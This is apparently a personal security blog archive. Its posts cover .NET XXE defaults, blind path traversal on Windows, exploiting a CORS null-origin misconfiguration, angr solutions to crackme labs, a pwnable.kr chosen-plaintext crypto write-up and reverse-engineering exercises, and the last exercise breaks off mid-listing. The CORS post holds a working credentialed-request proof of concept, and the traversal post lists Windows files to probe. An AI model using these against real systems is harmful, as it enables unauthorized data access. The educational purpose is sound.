Saturday, 18 May 2019

XXE with .NET in 2019

After the seminal blog post by James Jardine in 2016 on XXE exploitation in .NET applications back in 2016, Microsoft seems to have implemented some additional changes regarding the default behavior of XML parsers.
We work through the different XML methods provided and their corresponding vulnerable configurations. For all experiments, .NET framework 4.6 was chosen.

TL;DR: In order to create an XXE vulnerability for applications using .NET framework 4.6+, you have to instantiate a vulnerable XmlResolver beforehand.


XmlReader 

In order to allow the processing of external DTDs, both the DtdProcessing and the XmlResolver attributes have to be set accordingly.
The DtdProcessing attribute alone will not suffice.

The official Microsoft documentation states the following:

The XmlResolver type is used to resolve external XML resources, such as entities, document type definitions (DTDs), or schemas. It is also used to process include and import elements found in Extensible Stylesheet Language (XSL) style sheets or XML Schema definition language (XSD) schemas. (see https://docs.microsoft.com/de-de/dotnet/api/system.xml.xmlresolver?view=netframework-4.8)

An XmlResolver is used to access external documents. If set to null, an XmlException is thrown when the XmlReader tries to access an external resource. The default is a new XmlUrlResolver with no credentials. Starting with the .NET Framework 4.5.2, this setting has a default value of null.  (see https://docs.microsoft.com/de-de/dotnet/api/system.xml.xmlreadersettings.xmlresolver?view=netframework-4.8)




XmlTextReader

For this class, any DTD declarations will be automatically processed. However, for external entities there still is a corresponding XmlResolver required.



XmlDocument

Likewise, DTD declarations will be automatically parsed for this class. In order to be able to resolve external entities, an XmlResolver object has to be created.


XPathDocument

This class offers a variety of constructors, of which only the ones using XmlReader and XmlTextReader seem to be still vulnerable. Yet, these have to be configured in an insecure way as described above.



Summary

For newer versions of the .NET framework, the principle of secure defaults have been incorporated throughout for XML parsing. In a nutshell, you have to bend over backwards in order to create an XXE vulnerability.

Tuesday, 19 June 2018

Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems

In a recent engagement I was confronted with a blind path traversal vulnerability on a server running with the Microsoft Windows operating system. That is, it was not possible to display folder contents but the complete file name and path had to be guessed. Due to the lack of a comprehensive website I was forced to gather information from various different sources.

In this blog post, I want to summarize my findings and focus on the exploitation of  this kind of vulnerability.
Admittedly, vanilla path traversal vulnerabilities have become somewhat rare and Microsoft Windows as a server operating system is also more of an exception than the rule. However, in an XXE scenario, you may encounter a similar situation.
Also, this post will not shed light on the detection of this vulnerability - which is an art in itself and has already been thoroughly documented. In a nutshell, the key to the successful detection is to guess the correct path of a world-readable file (with the correct encoding).

Identifying vulnerable Applications


On Microsoft Windows, the following files are good choices since they are present in almost every version:

c:\windows\system.ini
c:\windows\win.ini

Assuming you have successfully identified a path traversal vulnerability, the only question is how further it can be escalated. The major obstacle is that you usually have to know in advance the exact location of the files you want to read. As opposed to *nix-based operating systems, the locations can differ significantly from one Windows installation to another. For instance, the main system drive letter may not be C: or the user name may differ from the standard Administrator.

First and foremost, we have to recall a few key characteristics of Windows operating systems:
  • Files and directories are handled case-insensitive: From an attacker perspective, our life will be easier since we only have to probe one variation of a given location. For example it suffices to test for ../../windows/win.ini instead of attempting also ../../WINDOWS/win.ini.
  • Forward and backward slashes can most of the times be used interchangeably; e.g., ../..\../windows/win.ini is a valid file path in Windows.

Determining the Privilege Level of the reading Process


In order to assess the severity of a path traversal bug, you should determine the privilege level of the process that peforms the file retrieval. From an attacker perspective, the process should ideally run with elevated privileges, i.e. by LocalSystem (= root equivalent) or by a member of the Administrators group.

If you can successfully retrieve one of the following files, you are at least a member of the Administrators group:


  • c:/documents and settings/administrator/ntuser.ini
  • c:/documents and settings/administrator/desktop/desktop.ini
  • c:/users/administrator/desktop/desktop.ini
  • c:/users/administrator/ntuser.ini


As already mentioned, there is a catch to this approach - there might be no such user account. In this case, you have to guess the name of an administrator account.

In contrast, the following files should be available on all modern Windows operating systems and are independent from the set up:


  • c:/system volume information/wpsettings.dat
  • C:/Windows/CSC/v2.0.6/pq
  • C:/Windows/CSC/v2.0.6/sm
  • C:/$Recycle.Bin/S-1-5-18/desktop.ini


If you can read either of these files, the file reading process has LocalSystem privileges.

Determining the Windows Version


Moreover, you should determine the exact version of Microsoft Windows. On Linux this is again far more simple, since we can read files such as the following:

  • /etc/issue
  • /etc/*release
  • /proc/version


Up until Windows 10, there is a similar file also containing version information, namely at

  • c:/windows/system32/license.rtf

It is also present on Windows 10, but it does not contain version information (which can also be used as a blind indicator). 
The best way is, however, to retrieve a Microsoft-compiled executable from the target system and analyze the included version information in the "file properties" tab.  Possible candidates are:

  • c:/windows/explorer.exe
  • c:/windows/notepad.exe
  • c:/windows/system32/ntoskrnl.exe

Afterwards, you can consulting the following table for looking up the corresponding operating system version:

  • 10.0 = Windows 10 / Windows Server 2016
  • 6.3 = Windows 8.1 / Windows Server 2012 R2
  • 6.2 = Windows 8 / Windows Server 2012
  • 6.1 = Windows 7 / Windows Server 2008 R2
  • 6.0 = Windows Vista / Windows Server 2008
  • 5.2 = Windows XP 64 Bit / Windows Server 2003
  • 5.1 = Windows XP
  • 5.0 = Windows 2000
  • 4.0 = Windows NT 4

Instead of the file properties tab, you can also use the peinfo package for Python to analyze the version number as follows:



Finetuning



To exploit the full potential of the path traversal vulnerability, you will likely have to perform an educated brute-force or dictionary attack, as the "interesting" files are technology-dependent.

The following list may be helpful as a first step and I would appreciate any additions or comments to this list:

https://github.com/soffensive/windowsblindread


References and follow-up links:

Web Application Hacker's Handbook, 2nd Edition
 https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
https://github.com/mubix/post-exploitation-wiki/blob/master/windows/files.md
http://pwnwiki.io/#!presence/windows/blind.md
https://blog.netspi.com/smb-attacks-through-directory-traversal/
https://digi.ninja/blog/when_all_you_can_do_is_read.php
https://superuser.com/questions/363018/how-do-i-tell-what-version-and-edition-of-windows-is-on-the-filesystem
https://docs.microsoft.com/en-us/windows/desktop/sysinfo/operating-system-version
https://docs.microsoft.com/en-us/windows/desktop/api/verrsrc/ns-verrsrc-tagvs_fixedfileinfo
https://stackoverflow.com/questions/1264472/using-the-pefile-py-to-get-file-exe-version

Monday, 23 April 2018

Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited.

Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

Origin: null

the server would respond with the following two HTTP headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data-url as follows:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Although the code above gives a hint to the right direction, it omits a complete proof of concept. I struggled to find code that would work across the browsers Chrome and Firefox, but eventually succeeded with the following snippet:

<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
    if (xhr.readyState === xhr.DONE) {
            console.log(xhr.response);
    }
};
xhr.send(null);
</script>'></iframe>

</body>

As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the corresponding HTTP response should be shown in the browser console.

Wednesday, 21 February 2018

Using angr and symbolic execution for reverse engineering challenges (RPI MBE Labs)

This blog posts will highlight how you can utilize the angr dynamic binary analysis framework and symbolic execution for reverse engineering tasks.

More precisely, we will look at the first two tasks in the lab1 of the RPISEC MBE labs.

While angr's internals are quite complex and require substantial effort for mastering, getting started for our simple examples requires not too much knowledge.  

The first example we will look at is lab1C from lab01, which requires the user to enter a certain password:

./lab1C
-----------------------------
--- RPISEC - CrackMe v1.0 ---
-----------------------------

Password: bluab

Invalid Password!!!

When inspecting the program's disassembly, we see the system() function is initialized and called from address 0x08048711 onwards:

Disassembly of lab1C:

   0x080486ad <+0>: push   ebp
   0x080486ae <+1>: mov    ebp,esp
   0x080486b0 <+3>: and    esp,0xfffffff0
   0x080486b3 <+6>: sub    esp,0x20
   0x080486b6 <+9>: mov    DWORD PTR [esp],0x80487d0
   0x080486bd <+16>: call   0x8048560 <puts@plt>
   0x080486c2 <+21>: mov    DWORD PTR [esp],0x80487ee
   0x080486c9 <+28>: call   0x8048560 <puts@plt>
   0x080486ce <+33>: mov    DWORD PTR [esp],0x80487d0
   0x080486d5 <+40>: call   0x8048560 <puts@plt>
   0x080486da <+45>: mov    DWORD PTR [esp],0x804880c
   0x080486e1 <+52>: call   0x8048550 <printf@plt>
   0x080486e6 <+57>: lea    eax,[esp+0x1c]
   0x080486ea <+61>: mov    DWORD PTR [esp+0x4],eax
   0x080486ee <+65>: mov    DWORD PTR [esp],0x8048818
   0x080486f5 <+72>: call   0x80485a0 <__isoc99_scanf@plt>
   0x080486fa <+77>: mov    eax,DWORD PTR [esp+0x1c]
   0x080486fe <+81>: cmp    eax,0x149a
   0x08048703 <+86>: jne    0x8048724 <main+119>
   0x08048705 <+88>: mov    DWORD PTR [esp],0x804881b
   0x0804870c <+95>: call   0x8048560 <puts@plt>
   0x08048711 <+100>: mov    DWORD PTR [esp],0x804882b
   0x08048718 <+107>: call   0x8048570 <system@plt>
   0x0804871d <+112>: mov    eax,0x0
   0x08048722 <+117>: jmp    0x8048735 <main+136>
   0x08048724 <+119>: mov    DWORD PTR [esp],0x8048833
   0x0804872b <+126>: call   0x8048560 <puts@plt>
   0x08048730 <+131>: mov    eax,0x1
   0x08048735 <+136>: leave  
   0x08048736 <+137>: ret    

Without looking further at the program logic, we have enough information to create a little script that will invoke angr and let us help with the challenge:




The main part of angr that is relevant to us is the SimulationManager object that guides the symbolic execution engine. We specify that we want to find an execution that reaches address 0x08048711 and start the symbolic execution of the program. After an execution has reached the address, we are interested in the input that led to the satisfying execution, which we can retrieve by specifying the file descriptor of stdin, which is 0.
Within a few seconds, the following output is generated:

python solve-lab1C.py
WARNING | 2018-02-21 13:12:01,239 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 13:12:02,652 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0000005274

While the program lab1C just compares the input to a hard-coded value, lab1B is a little bit more complicated. For the user it looks the same as lab1B, as a password has to be provided:

./lab1B 
.---------------------------.
|-- RPISEC - CrackMe v2.0 --|
'---------------------------'

Password: asas

Invalid Password!

Again, we first have a look at its disassembly, in particular the decrypt function:

Dump of assembler code for function decrypt:
   0x080489b7 <+0>: push   ebp
   0x080489b8 <+1>: mov    ebp,esp
   0x080489ba <+3>: sub    esp,0x38
   0x080489bd <+6>: mov    eax,gs:0x14
   0x080489c3 <+12>: mov    DWORD PTR [ebp-0xc],eax
   0x080489c6 <+15>: xor    eax,eax
   0x080489c8 <+17>: mov    DWORD PTR [ebp-0x1d],0x757c7d51
   0x080489cf <+24>: mov    DWORD PTR [ebp-0x19],0x67667360
   0x080489d6 <+31>: mov    DWORD PTR [ebp-0x15],0x7b66737e
   0x080489dd <+38>: mov    DWORD PTR [ebp-0x11],0x33617c7d
   0x080489e4 <+45>: mov    BYTE PTR [ebp-0xd],0x0
   0x080489e8 <+49>: push   eax
   0x080489e9 <+50>: xor    eax,eax
   0x080489eb <+52>: je     0x80489f0 <decrypt+57>
   0x080489ed <+54>: add    esp,0x4
   0x080489f0 <+57>: pop    eax
   0x080489f1 <+58>: lea    eax,[ebp-0x1d]
   0x080489f4 <+61>: mov    DWORD PTR [esp],eax
   0x080489f7 <+64>: call   0x8048810 <strlen@plt>
   0x080489fc <+69>: mov    DWORD PTR [ebp-0x24],eax
   0x080489ff <+72>: mov    DWORD PTR [ebp-0x28],0x0
   0x08048a06 <+79>: jmp    0x8048a28 <decrypt+113>
   0x08048a08 <+81>: lea    edx,[ebp-0x1d]
   0x08048a0b <+84>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a0e <+87>: add    eax,edx
   0x08048a10 <+89>: movzx  eax,BYTE PTR [eax]
   0x08048a13 <+92>: mov    edx,eax
   0x08048a15 <+94>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048a18 <+97>: xor    eax,edx
   0x08048a1a <+99>: lea    ecx,[ebp-0x1d]
   0x08048a1d <+102>: mov    edx,DWORD PTR [ebp-0x28]
   0x08048a20 <+105>: add    edx,ecx
   0x08048a22 <+107>: mov    BYTE PTR [edx],al
   0x08048a24 <+109>: add    DWORD PTR [ebp-0x28],0x1
   0x08048a28 <+113>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a2b <+116>: cmp    eax,DWORD PTR [ebp-0x24]
   0x08048a2e <+119>: jb     0x8048a08 <decrypt+81>
   0x08048a30 <+121>: mov    DWORD PTR [esp+0x4],0x8048d03
   0x08048a38 <+129>: lea    eax,[ebp-0x1d]
   0x08048a3b <+132>: mov    DWORD PTR [esp],eax
   0x08048a3e <+135>: call   0x8048770 <strcmp@plt>
   0x08048a43 <+140>: test   eax,eax
   0x08048a45 <+142>: jne    0x8048a55 <decrypt+158>
   0x08048a47 <+144>: mov    DWORD PTR [esp],0x8048d14
   0x08048a4e <+151>: call   0x80487e0 <system@plt>
   0x08048a53 <+156>: jmp    0x8048a61 <decrypt+170>
   0x08048a55 <+158>: mov    DWORD PTR [esp],0x8048d1c
   0x08048a5c <+165>: call   0x80487d0 <puts@plt>
   0x08048a61 <+170>: mov    eax,DWORD PTR [ebp-0xc]
   0x08048a64 <+173>: xor    eax,DWORD PTR gs:0x14
   0x08048a6b <+180>: je     0x8048a72 <decrypt+187>
   0x08048a6d <+182>: call   0x80487c0 <__stack_chk_fail@plt>
   0x08048a72 <+187>: leave  
   0x08048a73 <+188>: ret    
End of assembler dump.

The goal of the program is here likewise the call of the system() function with a specific argument, starting from address 0x08048a47. The solving-script is thus almost identical to the previous example:

Running, however, requires more time due to the exploration of several if-conditions and checking their satisfiability:

python solve-lab1B.py 
WARNING | 2018-02-21 12:35:23,576 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 12:35:25,180 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0322424827Z

Further examples that showcase applying angr to challenges of these kind are available on the Github repository of the angr developers.

Tuesday, 23 January 2018

pwnable.kr: crypto1 challenge

In the pwnable.kr challenge crypto1 in the rookies section, we are given the following two files client.py and server.py:



Furthermore, there is a running instance of client.py at pwnable.kr on port 9006. Our goal is to connect to this service and retrieve the flag.

We can infer from the two files the following facts:
  1. The only user-controlled inputs are the username and password strings.
  2. AES-128 (default) is used in CBC mode to encrypt the string "username-password-cookie".
  3. Before the plain text is processed by AES, it is padded with NULL values (\x00)
  4. The function request_auth() will show us for every supplied username and password the corresponding cipher text
  5. The password of a user is solely the SHA256 sum of the string "username"+"cookie" (+ denotes concatenation here). Thus, the password of a user is entirely dependent only on his username and the cookie value.
  6. The initialization vector is constant.
  7. We are given credentials for the user guest: guest / 8b465d23cb778d3636bf6c4c5e30d031675fd95cec7afea497d36146783fd3a1
  8. The flag will be read by client.py if and only if the return value retrieved from server.py is neither 0 or 1.
  9. The return value retrieved from server.py will only return a value different from 0 and 1 when the username is admin and the correct password is supplied for this user.
  10. As we know from (5), the password of admin can be computed once the secret cookie value is known.
  11. The username and password can only consist of values of the following character set:  '1234567890abcdefghijklmnopqrstuvwxyz-_'.
So there are numerous ways of approaching this challenge and it is definitely helpful to have a good understanding of common cryptographic engineering problems and pitfalls.
I initially thought about whether it would be possible to somehow infer information about the cookie from the provided credentials of the user "guest".

However, the key to the challenge is to utilize the cipher text oracle and perform a chosen-plaintext attack. Hence, we have to understand which parts of the input change the corresponding parts of the output. 

AES is a block cipher and operates on a block size of 16 bytes. Thus it is advisable to divide the cipher text into chunks of this size and choose different input parameters. Furthermore, we have to recall how our input is transformed BEFORE it is supplied as a plain text to the encryption routine.
The username is the first content of the plain text, followed by a single "-", the password, another "-" character and lastly the cookie.

When we choose for the username an input having at least 16 bytes, we note that the first 16 bytes of cipher text entirely depend on the username. For example, a username beginning with 16 'a' characters,  i.e. "aaaaaaaaaaaaaaaa", will always cause the first block of cipher text to be equal to "166827d3124ce5db2b36e803b9115a49", irrespective of the other characters of the username or the password.

When we choose exactly 15 times the character 'a' as the username, we know that the first 16 bytes of the actual plain text will be  "aaaaaaaaaaaaaaa-", since the encryption routine will append a trailing "-" as a delimiter between the username and password.
Similarly, when we choose exactly 14 times the character 'a' and an empty password, we know that the first 16 bytes of the actual plain text fed into AES will be "aaaaaaaaaaaaaa--". This is due to the fact that the password is empty and an additional "-" will be appended by the function "request_auth" as a delimiter between the password and the cookie.

Now we arrive at the point where the actual magic happens. What if we choose exactly 13 times the character "a" as the username and an empty password? As you correctly guessed, the function "request_auth" will append two "-" characters. Furthermore, it will append the first byte of the secret cookie value! 
Yet, as we only can see the cipher text, we do not know immediately the corresponding plain text. But we can save the 16 bytes of cipher text as a reference block and compute cipher text blocks for all possible values of the first cookie byte. As soon as the computed cipher text block is equal to the reference block, we know we have correctly guessed the cookie byte value! This whole procedure is also known as one-byte-at-a-time decryption. 

The details of the actual attack are a little bit more intricate, since we cannot directly compute cipher texts but have to rely on the "request_auth" function, which will append "-" characters. 
Concerning the guessing of the first cookie byte value, for the reference block we have to choose 13 times the character "-". For the subsequent  guesses, we will have to choose a username consisting of 15 times the character "-" and the 16th character will be the guessed cookie byte value.

You are highly encouraged to work out a fully working decryption routine yourself. Once you have completed it, try a variant of the attack by keeping the username value constant and alter instead the password value.
For the sake of completeness, here you have my proposed solution:


Thursday, 7 December 2017

Practical Reverse Engineering Exercise Solutions: Page 79 / Exercise 11

Exercise 11 on page 79 of the book Practical Reverse Engineering specifies the following ARM disassembly of a function called mystery11 - the last exercise of the ARM chapter:

01: 010185B0             mystery11
02: 010185B0 2D E9 F8 4F   PUSH.W   {R3–R11,LR}
03: 010185B4 0D F2 20 0B   ADDW     R11, SP, #0x20
04: 010185B8 B0 F9 5A 30   LDRSH.W  R3, [R0,#0x5A]
05: 010185BC 07 46         MOV      R7, R0
06: 010185BE 90 46         MOV      R8, R2
07: 010185C0 00 EB 83 03   ADD.W    R3, R0, R3,LSL#2
08: 010185C4 D3 F8 84 A0   LDR.W    R10, [R3,#0x84]
09: 010185C8 7B 8F         LDRH     R3, [R7,#0x3A]
10: 010185CA 89 46         MOV      R9, R1
11: 010185CC CB B9         CBNZ     R3, loc_1018602
12: 010185CE B0 F9 5A 40   LDRSH.W  R4, [R0,#0x5A]
13: 010185D2 17 F1 20 02   ADDS.W   R2, R7, #0x20
14: 010185D6 00 EB 44 03   ADD.W    R3, R0, R4,LSL#1
15: 010185DA B3 F8 5C 50   LDRH.W   R5, [R3,#0x5C]
16: 010185DE 00 EB 84 03   ADD.W    R3, R0, R4,LSL#2
17: 010185E2 D3 F8 84 00   LDR.W    R0, [R3,#0x84]
18: 010185E6 83 89         LDRH     R3, [R0,#0xC]
19: 010185E8 06 6C         LDR      R6, [R0,#0x40]
20: 010185EA 03 EB 45 03   ADD.W    R3, R3, R5,LSL#1
21: 010185EE 9B 19         ADDS     R3, R3, R6
22: 010185F0 1C 78         LDRB     R4, [R3]
23: 010185F2 5B 78         LDRB     R3, [R3,#1]
24: 010185F4 43 EA 04 24   ORR.W    R4, R3, R4,LSL#8
25: 010185F8 43 8A         LDRH     R3, [R0,#0x12]
26: 010185FA 23 40         ANDS     R3, R4
27: 010185FC 99 19         ADDS     R1, R3, R6
28: 010185FE FD F7 8D FF   BL       sub_101651C

29: 01018602      loc_1018602
30: 01018602 BA 8E         LDRH     R2, [R7,#0x34]
31: 01018604 BB 6A         LDR      R3, [R7,#0x28]
32: 01018606 D0 18         ADDS     R0, R2, R3
33: 01018608 9A F8 02 30   LDRB.W   R3, [R10,#2]
34: 0101860C 0B B1         CBZ      R3, loc_1018612
35: 0101860E 00 22         MOVS     R2, #0
36: 01018610 00 E0         B        loc_1018614

37: 01018612      loc_1018612
38: 01018612 3A 6A         LDR      R2, [R7,#0x20]

39: 01018614      loc_1018614
40: 01018614 FB 8E         LDRH     R3, [R7,#0x36]
41: 01018616 B8 F1 00 0F   CMP.W    R8, #0
42: 0101861A 01 D0         BEQ      loc_1018620
43: 0101861C 80 18         ADDS     R0, R0, R2
44: 0101861E 9B 1A         SUBS     R3, R3, R2

45: 01018620      loc_1018620
46: 01018620 C9 F8 00 30   STR.W    R3, [R9]
47: 01018624 BD E8 F8 8F   POP.W    {R3–R11,PC}
48: 01018624             ; End of function mystery11

According to the exercise description, the called subroutine sub_101651C in line 28 takes three arguments and does not return anything. Thus, we know the registers R0, R1 and R2 are prepared and passed to the function.

The function is executed in Thumb mode, as we can see from the different instructions having both a width of 16 and 32 bits. Furthermore, Thumb specific instructions such as PUSH.W, POP.W and STR.W are contained in the disassembly.

With regard to the instruction semantics, we shed light on the following examples:

LDRSH.W  R3, [R0,#0x5A]: Load Signed Halfword Into Register. For the ARM architcture, a word is a 32-bit value and a half-word a 16-bit value. Thus, a signed 16-bit integer value (2 bytes) is loaded from the memory location [R0 + 0x5A] into R3.

LDRH     R3, [R0,#0xC]: Load Half Word Into Register. Slightly different than LDRSH, this instruction loads an unsigned 16-bit integer value into the destination register. In particular, it loads from memory at [R0 + 0xC] into register R3.

ADD.W    R3, R0, R3,LSL#2: This composition of arithmetic operations is equal to the following expression: R3 = R0 + (R3 << 2)

ORR.W    R4, R3, R4,LSL#8: This composition of logical operations is equal to the following expression: R4 = R3 |  (R4 << 8)

Let us know examine the data types of mystery11's arguments. R0 seems to be a pointer to a data structure, as we are accessing its field member at offset 0x5A. We create a provisional unknownStruct1:

unknownStruct1:
field5a_sint16; // 2 byte signed integer value (i.e. sint16) - line 4

R1 is first accessed in line 10 and its value is copied into R9, which is  used in line 46 as a destination address for storing a 32 bit value. Thus, we assume it is a pointer as well to an unknown memory structure.

The third argument in R2 is preserved in R8 (line 6) and used for a check against zero (line 41). Hence, we assume it is a 32-bit unsigned integer.

As far as the return value is concerned, we notice the return register R0 is set either in line 32 or 43 before the function exits. In both cases, an addition is performed so we assume it is of type uint32.

Our first function prototype proposal:

uint32 mystery11 (unknownStruct1* arg1, int* arg2, uint32 arg3);

Although the function contains no loops, the plethora of memory accesses does not permit us to reason about its functionality at a high level. Thus, we provide the first attempt to generate C code from the disassembly step-by-step along with the data structures:

unknownStruct1:
field20_uint32; // unknown 4 byte value - line 38
field28_uint32; // unknown 4 byte value - line 31
field34_uint16; // unknown 2 byte value - line 30
field36_uint16; // unknown 2 byte value - line 40
field3a_uint16; // 2 byte unsigned integer - line 9
field5a_sint16; // 2 byte signed integer value (i.e. sint16) - line 4


unknownStruct2:
field84_unknownstruct3_p; // pointer to an instance of unknownStruct3


unknownStruct3:
field02_c; // line 33
field12_uint16; // line 25
field0C_uint16; // line 18
field40_p; // line 19 


unknownStruct4:
field5c_uint16; // line 15


uint32 mystery11 (unknownStruct1* arg1, int* arg2, uint32 arg3) {

sint16 r3 = arg1->field5a_sint16; // line 4
unknownStruct1* r7 = arg1; // line 5
uint32 r8 = arg3; // line 6

unknownStruct2* r3 = arg1 + (arg1->field5a_sint16 * 4); // lines 4, 7

unknownStruct3* r10 = r3->field84_p; // line 8
uint16 r3 = arg1->field3a_uint16; // line 9
int* r9 = arg2; // line 10

if (r3 == 0) { // line 11

uint32 r2 = arg1 + 0x20; // line 13

sint16 r4 = arg1->field5a_sint16; // line 12

unknownStruct4* r3 = arg1 + (r4 * 2); // line 14

uint16 r5 = r3->field5c_uint16; // line 15

unknownStruct2* r3 = arg1 + (r4 * 4);  // line 16 - Probably unknownStruct5 == unknownStruct2, since we access the same memory location as in line 7

unknownStruct3* r0 = r3->field84_p; // line 17 - strong similarity to line 8

uint16 r3 = r0->field0C_uint16; // line 18
int* r6 = r0->field40_p; // line 19  - this is most likely a pointer due to the subsequent address calculations

uint32 r3 = r3 + (r5 * 2); // line 20
r3 = r6 + r3; // line 21

char r4 = r3[0]; // line 22
char r3 = r3[1]; // line 23 

r4 = r3 | (r4 << 8); // line 24 - we effectively obtain a 16-bit value by ORing two 8-bit values, where one was shifted 8 positions to the left

uint16 r3 = r0->field12_uint16; // line 25

r3 = r3 & r4; // line 26

r1 = r6 + r3; // line 27

sub_101651C(r0, r1, r2); 
}

uint16 r2 = arg1->field34_uint16; // line 30
uint32 r3 = arg1->field28_uint32; // line 31

uint32 r0 = r2 + r3; // line 32

char r3 = r10->field02_c; // line 33

if (r3 == 0) { // line 34
uint32 r2 = arg1->field20_uint32; // line 38
}
else {
uint32 r2 = 0; // line 35
}

uint16 r3 = arg1->field36_uint16; // line 40

if (arg3 != 0) { // lines 41,42
r0 = r0 + r2; // line 43
r3 = r3 + r2; // line 44
}

*arg2 = r3; // line 46
}


To be honest, this looks like a huge mess, but it is just our first attempt and we will try to refine the code and make it more readable.

Firstly, we follow the data flow from the end of the program to see what kind of value will be stored in the pointer arg2. We notice there can be at most a 32-bit value, so we change the data type of arg2 from int* to uint32*.
Secondly, we eliminate instructions that are either unnecessary or duplicated.
Thirdly, we try to minimize the number of C code by combining the load with the different arithmetic or comparison operations.
Fourthly, we try to give the variables more descriptive names. For instance, the third argument arg3 is only used to indicate or whether or not the addition in the last conditional block should be executed. Therefore, we choose its name to be "performAddition". The subroutine sub_101651C was named perform_magic.

unknownStruct1:
field20_uint32; // unknown 4 byte value - line 38
field28_uint32; // unknown 4 byte value - line 31
field34_uint16; // unknown 2 byte value - line 30
field36_uint16; // unknown 2 byte value - line 40
field3a_uint16; // 2 byte unsigned integer - line 9
field5a_sint16; // 2 byte signed integer value (i.e. sint16) - line 4


unknownStruct2:
field84_unknownstruct3_p; // pointer to an instance of unknownStruct3


unknownStruct3:
field02_c; // line 33
field12_uint16; // line 25
field0C_uint16; // line 18
field40_p; // line 19 


unknownStruct4:
field5c_uint16; // line 15


uint32 mystery11 (unknownStruct1* unknownStruct1Ptr, int* dest, uint32 indicator) {


unknownStruct2* r3 = unknownStruct1Ptr + (unknownStruct1Ptr->field5a_sint16 * 4); // lines 4, 7
unknownStruct3* r10 = r3->field84_unknownstruct3_p; // line 8

if (unknownStruct1Ptr->field3a_uint16 == 0) { // lines 9,11

sint16 r4 = unknownStruct1Ptr->field5a_sint16; // line 12

unknownStruct4* r3 = unknownStruct1Ptr + (r4 * 2); // line 14

uint16 r5 = r3->field5c_uint16; // line 15

unknownStruct2* r3 = unknownStruct1Ptr + (r4 * 4);  // line 16 - Probably unknownStruct5 == unknownStruct2, since we access the same memory location as in line 7

unknownStruct3* r0 = r3->field84_unknownstruct3_p; // line 17 - strong similarity to line 8

uint16 r3 = r0->field0C_uint16; // line 18
int* r6 = r0->field40_p; // line 19  - this is most likely a pointer due to the subsequent address calculations

uint32 r3 = r6 + r3 + (r5 * 2); // lines 20, 21


uint32 r4 = r3[1] | (r3[0] << 8); // lines 22, 23, 24 - we effectively obtain a 16-bit value by ORing two 8-bit values, where one was shifted 8 positions to the left

uint32 r3 = r0->field12_uint16 & r4; // lines 25, 26

r1 = r6 + r3; // line 27

perform_magic(r0, r1, &(unknownStruct1Ptr->field20_uint32)); // lines 13, 28
}

uint32 r0 = arg1->field34_uint16 + arg1->field28_uint32; // lines 30,31, 32
uint32 r2 = 0; // line 35

if (r10->field02_c == 0) { // line 34
r2 = arg1->field20_uint32; // line 38
}

uint16 r3 = unknownStruct1Ptr->field36_uint16; // line 40

if (indicator != 0) { // lines 41,42
r0 = r0 + r2; // line 43
r3 = r3 + r2; // line 44
}

*dest = r3; // line 46
return r0;
}

Wednesday, 6 December 2017

Practical Reverse Engineering Exercise Solutions: Page 79 / Exercise 10

Exercise 10 on page 79 of the book Practical Reverse Engineering specifies the following ARM disassembly of a function called mystery10:

01:             mystery10
02: 2D E9 70 48   PUSH.W   {R4–R6,R11,LR}
03: 0D F2 0C 0B   ADDW     R11, SP, #0xC
04: 37 F0 CC F9   BL       __security_push_cookie
05: 84 B0         SUB      SP, SP, #0x10
06: 0D 46         MOV      R5, R1
07: 00 24         MOVS     R4, #0
08: 10 2D         CMP      R5, #0x10
09: 16 46         MOV      R6, R2
10: 0C D3         BCC      loc_1010786
11: 1A 4B         LDR      R3, =__imp_GetSystemTime
12: 68 46         MOV      R0, SP
13: 1B 68         LDR      R3, [R3]
14: 98 47         BLX      R3
15: 00 9B         LDR      R3, [SP,#0x1C+var_1C]
16: 10 24         MOVS     R4, #0x10
17: 33 60         STR      R3, [R6]
18: 01 9B         LDR      R3, [SP,#0x1C+var_18]
19: 73 60         STR      R3, [R6,#4]
20: 02 9B         LDR      R3, [SP,#0x1C+var_14]
21: B3 60         STR      R3, [R6,#8]
22: 03 9B         LDR      R3, [SP,#0x1C+var_10]
23: F3 60         STR      R3, [R6,#0xC]

24:      loc_1010786
25: 2B 1B         SUBS     R3, R5, R4
26: 04 2B         CMP      R3, #4
27: 04 D3         BCC      loc_1010796
28: 11 4B         LDR      R3, =__imp_GetCurrentProcessId
29: 1B 68         LDR      R3, [R3]
30: 98 47         BLX      R3
31: 30 51         STR      R0, [R6,R4]
32: 04 34         ADDS     R4, #4

33:      loc_1010796
34: 2B 1B         SUBS     R3, R5, R4
35: 04 2B         CMP      R3, #4
36: 04 D3         BCC      loc_10107A6
37: 0C 4B         LDR      R3, =__imp_GetTickCount
38: 1B 68         LDR      R3, [R3]
39: 98 47         BLX      R3
40: 30 51         STR      R0, [R6,R4]
41: 04 34         ADDS     R4, #4

42:      loc_10107A6
43: 2B 1B         SUBS     R3, R5, R4
44: 08 2B         CMP      R3, #8
45: 09 D3         BCC      loc_10107C0
46: 07 4B         LDR      R3, =__imp_QueryPerformanceCounter
47: 68 46         MOV      R0, SP
48: 1B 68         LDR      R3, [R3]
49: 98 47         BLX      R3
